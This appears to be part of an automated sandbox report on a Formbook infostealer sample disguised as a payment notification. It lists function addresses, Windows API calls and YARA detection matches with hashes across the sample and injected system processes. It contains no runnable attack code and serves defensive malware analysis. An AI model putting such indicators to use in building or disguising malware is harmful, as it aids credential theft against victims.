Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe

Code function: 0_2_00991201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_00991201

Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe

Code function: 0_2_0099E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_0099E8F6

Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe	Code function: 0_2_009A2046	0_2_009A2046
Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe	Code function: 0_2_00938060	0_2_00938060
Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe	Code function: 0_2_00998298	0_2_00998298
Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe	Code function: 0_2_0096E4FF	0_2_0096E4FF
Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe	Code function: 0_2_0096676B	0_2_0096676B
Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe	Code function: 0_2_009C4873	0_2_009C4873
Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe	Code function: 0_2_0095CAA0	0_2_0095CAA0
Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe	Code function: 0_2_0093CAF0	0_2_0093CAF0
Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe	Code function: 0_2_0094CC39	0_2_0094CC39
Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe	Code function: 0_2_00966DD9	0_2_00966DD9
Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe	Code function: 0_2_009391C0	0_2_009391C0
Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe	Code function: 0_2_0094B119	0_2_0094B119
Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe	Code function: 0_2_00951394	0_2_00951394
Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe	Code function: 0_2_00951706	0_2_00951706
Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe	Code function: 0_2_0095781B	0_2_0095781B
Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe	Code function: 0_2_009519B0	0_2_009519B0
Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe	Code function: 0_2_00937920	0_2_00937920
Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe	Code function: 0_2_0094997D	0_2_0094997D
Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe	Code function: 0_2_00957A4A	0_2_00957A4A
Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe	Code function: 0_2_00957CA7	0_2_00957CA7
Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe	Code function: 0_2_00951C77	0_2_00951C77
Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe	Code function: 0_2_00969EEE	0_2_00969EEE
Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe	Code function: 0_2_009BBE44	0_2_009BBE44
Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe	Code function: 0_2_00951F32	0_2_00951F32
Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe	Code function: 0_2_01316FC0	0_2_01316FC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_003C6871	2_2_003C6871
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_003C6873	2_2_003C6873
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_003B28A0	2_2_003B28A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_003B1110	2_2_003B1110
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_003C0173	2_2_003C0173
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_003BE1F3	2_2_003BE1F3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_003B1290	2_2_003B1290
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_003B3500	2_2_003B3500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_003B26A0	2_2_003B26A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_003B2698	2_2_003B2698
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_003B268A	2_2_003B268A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_003BFF53	2_2_003BFF53
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_003DD753	2_2_003DD753
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_003BFF4A	2_2_003BFF4A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FA352	2_2_030FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304E3F0	2_2_0304E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031003E6	2_2_031003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E0274	2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C02C0	2_2_030C02C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03030100	2_2_03030100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DA118	2_2_030DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C8158	2_2_030C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031001AA	2_2_031001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F81CC	2_2_030F81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D2000	2_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03064750	2_2_03064750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040770	2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303C7C0	2_2_0303C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305C6E0	2_2_0305C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040535	2_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03100591	2_2_03100591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E4420	2_2_030E4420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F2446	2_2_030F2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030EE4F6	2_2_030EE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FAB40	2_2_030FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F6BD7	2_2_030F6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303EA80	2_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03056962	2_2_03056962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030429A0	2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0310A9A6	2_2_0310A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304A840	2_2_0304A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03042840	2_2_03042840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030268B8	2_2_030268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306E8F0	2_2_0306E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03082F28	2_2_03082F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03060F30	2_2_03060F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E2F30	2_2_030E2F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B4F40	2_2_030B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030BEFA0	2_2_030BEFA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03032FC8	2_2_03032FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304CFE0	2_2_0304CFE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FEE26	2_2_030FEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040E59	2_2_03040E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03052E90	2_2_03052E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FCE93	2_2_030FCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FEEDB	2_2_030FEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304AD00	2_2_0304AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DCD1F	2_2_030DCD1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03058DBF	2_2_03058DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303ADE0	2_2_0303ADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040C00	2_2_03040C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E0CB5	2_2_030E0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03030CF2	2_2_03030CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F132D	2_2_030F132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302D34C	2_2_0302D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0308739A	2_2_0308739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030452A0	2_2_030452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305B2C0	2_2_0305B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E12ED	2_2_030E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0307516C	2_2_0307516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302F172	2_2_0302F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0310B16B	2_2_0310B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304B1B0	2_2_0304B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030EF0CC	2_2_030EF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030470C0	2_2_030470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F70E9	2_2_030F70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FF0E0	2_2_030FF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FF7B0	2_2_030FF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F16CC	2_2_030F16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F7571	2_2_030F7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DD5B0	2_2_030DD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FF43F	2_2_030FF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03031460	2_2_03031460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FFB76	2_2_030FFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305FB80	2_2_0305FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B5BF0	2_2_030B5BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0307DBF9	2_2_0307DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FFA49	2_2_030FFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F7A46	2_2_030F7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B3A6C	2_2_030B3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DDAAC	2_2_030DDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03085AA0	2_2_03085AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E1AA3	2_2_030E1AA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030EDAC6	2_2_030EDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D5910	2_2_030D5910
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03049950	2_2_03049950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305B950	2_2_0305B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AD800	2_2_030AD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030438E0	2_2_030438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FFF09	2_2_030FFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03041F92	2_2_03041F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FFFB1	2_2_030FFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03049EB0	2_2_03049EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03043D40	2_2_03043D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F1D5A	2_2_030F1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F7D73	2_2_030F7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305FDC0	2_2_0305FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B9C32	2_2_030B9C32
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FFCF2	2_2_030FFCF2
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03AE03E6	5_2_03AE03E6
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03A2E3F0	5_2_03A2E3F0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03ADA352	5_2_03ADA352
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03AA02C0	5_2_03AA02C0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03AC0274	5_2_03AC0274
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03AE01AA	5_2_03AE01AA
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03AD81CC	5_2_03AD81CC
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03A10100	5_2_03A10100
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03ABA118	5_2_03ABA118
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03AA8158	5_2_03AA8158
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03AB2000	5_2_03AB2000
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03A1C7C0	5_2_03A1C7C0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03A20770	5_2_03A20770
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03A44750	5_2_03A44750
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03A3C6E0	5_2_03A3C6E0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03AE0591	5_2_03AE0591
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03A20535	5_2_03A20535
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03ACE4F6	5_2_03ACE4F6
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03AD2446	5_2_03AD2446
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03AD6BD7	5_2_03AD6BD7
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03ADAB40	5_2_03ADAB40
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03A1EA80	5_2_03A1EA80
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03A229A0	5_2_03A229A0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03AEA9A6	5_2_03AEA9A6
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03A36962	5_2_03A36962
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03A068B8	5_2_03A068B8
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03A4E8F0	5_2_03A4E8F0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03A22840	5_2_03A22840
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03A2A840	5_2_03A2A840
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03A9EFA0	5_2_03A9EFA0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03A2CFE0	5_2_03A2CFE0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03A12FC8	5_2_03A12FC8
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03A62F28	5_2_03A62F28
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03A40F30	5_2_03A40F30
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03A94F40	5_2_03A94F40
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03A32E90	5_2_03A32E90
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03ADCE93	5_2_03ADCE93
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03ADEEDB	5_2_03ADEEDB
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03ADEE26	5_2_03ADEE26
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03A20E59	5_2_03A20E59
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03A38DBF	5_2_03A38DBF
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03A1ADE0	5_2_03A1ADE0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03A2AD00	5_2_03A2AD00
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03AC0CB5	5_2_03AC0CB5
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03A10CF2	5_2_03A10CF2
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03A20C00	5_2_03A20C00
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03A6739A	5_2_03A6739A
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03AD132D	5_2_03AD132D
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03A0D34C	5_2_03A0D34C
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03A252A0	5_2_03A252A0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03AC12ED	5_2_03AC12ED
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03A3B2C0	5_2_03A3B2C0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03A2B1B0	5_2_03A2B1B0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03AEB16B	5_2_03AEB16B
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03A5516C	5_2_03A5516C
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03A0F172	5_2_03A0F172
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03AD70E9	5_2_03AD70E9
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03ADF0E0	5_2_03ADF0E0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03ACF0CC	5_2_03ACF0CC
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03A270C0	5_2_03A270C0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03ADF7B0	5_2_03ADF7B0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03AD16CC	5_2_03AD16CC
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03ABD5B0	5_2_03ABD5B0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03AD7571	5_2_03AD7571
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03ADF43F	5_2_03ADF43F
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03A11460	5_2_03A11460
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03A3FB80	5_2_03A3FB80
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03A95BF0	5_2_03A95BF0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03A5DBF9	5_2_03A5DBF9
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03ADFB76	5_2_03ADFB76
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03A65AA0	5_2_03A65AA0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03ABDAAC	5_2_03ABDAAC
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03ACDAC6	5_2_03ACDAC6
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03A93A6C	5_2_03A93A6C
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03ADFA49	5_2_03ADFA49
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03AD7A46	5_2_03AD7A46
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03AB5910	5_2_03AB5910
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03A29950	5_2_03A29950
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03A3B950	5_2_03A3B950
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03A238E0	5_2_03A238E0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03A8D800	5_2_03A8D800
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03ADFFB1	5_2_03ADFFB1
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03A21F92	5_2_03A21F92
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03ADFF09	5_2_03ADFF09
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03A29EB0	5_2_03A29EB0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03A3FDC0	5_2_03A3FDC0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03AD7D73	5_2_03AD7D73
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03A23D40	5_2_03A23D40
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03AD1D5A	5_2_03AD1D5A
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03ADFCF2	5_2_03ADFCF2
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03A99C32	5_2_03A99C32
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_032515E0	5_2_032515E0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_032530EE	5_2_032530EE
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_032530F0	5_2_032530F0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_0324C7C7	5_2_0324C7C7
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_0324C7D0	5_2_0324C7D0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_0324AA70	5_2_0324AA70
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_0324C9F0	5_2_0324C9F0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_03269FD0	5_2_03269FD0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_0382A0AF	5_2_0382A0AF
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_0382B9D6	5_2_0382B9D6
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_0382B8B4	5_2_0382B8B4
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_0382ADD8	5_2_0382ADD8
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 5_2_0382BD6C	5_2_0382BD6C

Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe	Code function: String function: 00950A30 appears 46 times
Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe	Code function: String function: 00939CB3 appears 31 times
Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe	Code function: String function: 0094F9F2 appears 40 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 030AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0302B970 appears 277 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 030BF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03075130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03087E54 appears 102 times
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: String function: 03A8EA12 appears 86 times
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: String function: 03A0B970 appears 272 times
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: String function: 03A67E54 appears 99 times
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: String function: 03A55130 appears 56 times
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: String function: 03A9F290 appears 105 times

Source: Payment Notification Confirmation 010_01_2025.exe, 00000000.00000003.1304604976.0000000003CAD000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Payment Notification Confirmation 010_01_2025.exe
Source: Payment Notification Confirmation 010_01_2025.exe, 00000000.00000003.1305046595.0000000003B03000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Payment Notification Confirmation 010_01_2025.exe

Source: Payment Notification Confirmation 010_01_2025.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 2.2.svchost.exe.3b0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.svchost.exe.3b0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.1457779729.00000000003B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.3761759858.0000000003630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.1458665245.0000000003390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
